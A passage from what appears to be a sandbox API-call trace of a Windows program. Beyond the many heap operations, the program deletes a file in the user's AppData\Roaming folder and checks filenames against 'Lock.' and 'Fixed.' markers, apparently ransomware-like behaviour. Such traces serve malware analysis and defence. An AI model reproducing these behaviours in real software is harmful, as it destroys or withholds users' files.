lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0207.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0207.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0207.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0207.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0207.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0207.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0207.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0207.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0207.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0207.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0207.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0207.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0207.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0207.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0207.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0207.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0207.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0207.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0207.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0207.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0207.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0207.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0207.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0207.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0207.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0207.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0207.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0207.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0207.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0207.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0207.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0207.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0207.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0207.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0207.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0207.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0207.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0207.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0207.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0207.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x3515e50 | out: hHeap=0x25c0000) returned 1 [0207.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0207.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0207.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0207.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0207.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0207.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0207.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0207.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0207.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0207.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0207.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0207.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0207.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0207.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0207.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0207.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0207.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0207.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0207.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0207.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3020 | out: hHeap=0x25c0000) returned 1 [0207.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0207.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0207.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0207.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0207.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0207.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0207.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0207.284] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0207.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0207.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0207.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0207.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0207.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0207.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0207.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0207.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0207.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0207.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18d8 [0207.285] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0207.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0207.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0207.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0207.285] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0207.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0207.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0207.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0207.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0207.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0207.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0207.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0207.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0207.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0207.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0207.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0207.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0207.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0207.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0207.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0207.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0207.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0207.286] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/yI2BOQ.jpg", nBufferLength=0x104, lpBuffer=0x8bee20, lpFilePart=0x8bedfc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\yI2BOQ.jpg", lpFilePart=0x8bedfc*="yI2BOQ.jpg") returned 0x38 [0207.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24f5278 | out: hHeap=0x25c0000) returned 1 [0207.286] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\yI2BOQ.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\yi2boq.jpg")) returned 0x2020 [0207.286] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\yI2BOQ.jpg", lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4a579e30, ftCreationTime.dwHighDateTime=0x1d4ccb5, ftLastAccessTime.dwLowDateTime=0x99b27a90, ftLastAccessTime.dwHighDateTime=0x1d4d539, ftLastWriteTime.dwLowDateTime=0x99b27a90, ftLastWriteTime.dwHighDateTime=0x1d4d539, nFileSizeHigh=0x0, nFileSizeLow=0x109f6, dwReserved0=0xecb, dwReserved1=0x4, cFileName="yI2BOQ.jpg", cAlternateFileName="")) returned 0xaa5820 [0207.286] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\yI2BOQ.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\yi2boq.jpg")) returned 1 [0207.288] FindNextFileW (in: hFindFile=0xaa5820, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4a579e30, ftCreationTime.dwHighDateTime=0x1d4ccb5, ftLastAccessTime.dwLowDateTime=0x99b27a90, ftLastAccessTime.dwHighDateTime=0x1d4d539, ftLastWriteTime.dwLowDateTime=0x99b27a90, ftLastWriteTime.dwHighDateTime=0x1d4d539, nFileSizeHigh=0x0, nFileSizeLow=0x109f6, dwReserved0=0xecb, dwReserved1=0x4, cFileName="yI2BOQ.jpg", cAlternateFileName="")) returned 0 [0207.288] FindClose (in: hFindFile=0xaa5820 | out: hFindFile=0xaa5820) returned 1 [0207.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0207.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0207.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0207.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0207.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0207.289] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0207.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0207.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0207.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0207.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0207.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0207.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0207.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0207.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0207.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0207.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0207.289] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0207.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0207.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0207.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9f30 [0207.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0207.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0207.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa0b0 [0207.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0207.290] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0207.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0207.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0207.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0207.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0207.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0207.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0207.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0207.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0207.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0207.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0207.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0207.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0207.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0207.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0207.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0207.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0207.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x249c7b0 [0207.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0207.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0207.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0207.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0207.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0207.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0207.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0207.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0207.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0207.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0207.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0207.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0207.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0207.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0207.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0207.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0207.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0207.292] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/yI2BOQ.jpg", nBufferLength=0x104, lpBuffer=0x8bf664, lpFilePart=0x8bf658 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\yI2BOQ.jpg", lpFilePart=0x8bf658*="yI2BOQ.jpg") returned 0x38 [0207.292] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0207.292] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0207.292] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0207.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0207.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0207.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0207.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0207.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0207.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0207.292] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ynNikGKB3oJVJW2VhiLE.ots", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0207.292] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nNikGKB3oJVJW2VhiLE.ots", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0207.293] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NikGKB3oJVJW2VhiLE.ots", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0207.293] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ikGKB3oJVJW2VhiLE.ots", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0207.293] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kGKB3oJVJW2VhiLE.ots", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0207.293] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GKB3oJVJW2VhiLE.ots", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0207.293] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="KB3oJVJW2VhiLE.ots", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0207.293] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B3oJVJW2VhiLE.ots", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0207.293] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3oJVJW2VhiLE.ots", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0207.293] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oJVJW2VhiLE.ots", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0207.293] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JVJW2VhiLE.ots", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0207.293] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VJW2VhiLE.ots", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0207.293] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JW2VhiLE.ots", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0207.293] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="W2VhiLE.ots", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0207.293] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2VhiLE.ots", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0207.293] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VhiLE.ots", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0207.293] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hiLE.ots", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0207.293] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iLE.ots", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0207.293] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LE.ots", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0207.293] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="E.ots", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0207.293] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0207.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0207.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0207.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0207.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0207.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0207.294] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ynNikGKB3oJVJW2VhiLE.ots", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0207.294] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nNikGKB3oJVJW2VhiLE.ots", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 